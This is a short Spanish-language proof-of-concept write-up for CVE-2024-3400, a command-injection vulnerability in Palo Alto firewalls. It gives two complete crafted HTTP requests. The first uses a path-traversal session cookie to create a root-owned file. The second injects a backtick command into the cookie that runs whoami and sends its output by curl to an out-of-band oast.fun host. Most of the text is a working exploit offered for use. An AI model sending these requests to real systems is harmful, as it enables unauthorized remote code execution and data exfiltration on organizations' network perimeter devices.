
Prueba de concepto del exploit para CVE-2024-3400, una vulnerabilidad de inyección de comandos en firewalls de Palo Alto, que demuestra la creación de archivos y la ejecución remota de comandos mediante solicitudes HTTP manipuladas.
CVE-2024-3400 es una vulnerabilidad de inyección de comandos presente en los sistemas de firewall de Palo Alto. Un atacante, mediante una solicitud HTTP cuidadosamente elaborada, puede ejecutar comandos maliciosos en el servidor objetivo e incluso obtener privilegios de root.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Después de enviar esta solicitud, se creará un archivo llamado hellome1337.txt en el servidor, y dicho archivo tendrá privilegios de root.
Las capturas de pantalla muestran el efecto durante el proceso de explotación de esta vulnerabilidad:


Para explotar esta vulnerabilidad y ejecutar una inyección de comandos, puede enviar la siguiente solicitud HTTP:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Esta solicitud ejecutará el comando whoami en el servidor y enviará el resultado al servidor remoto especificado (por ejemplo: xxxxxxxxxxxxxxxxx.oast.fun).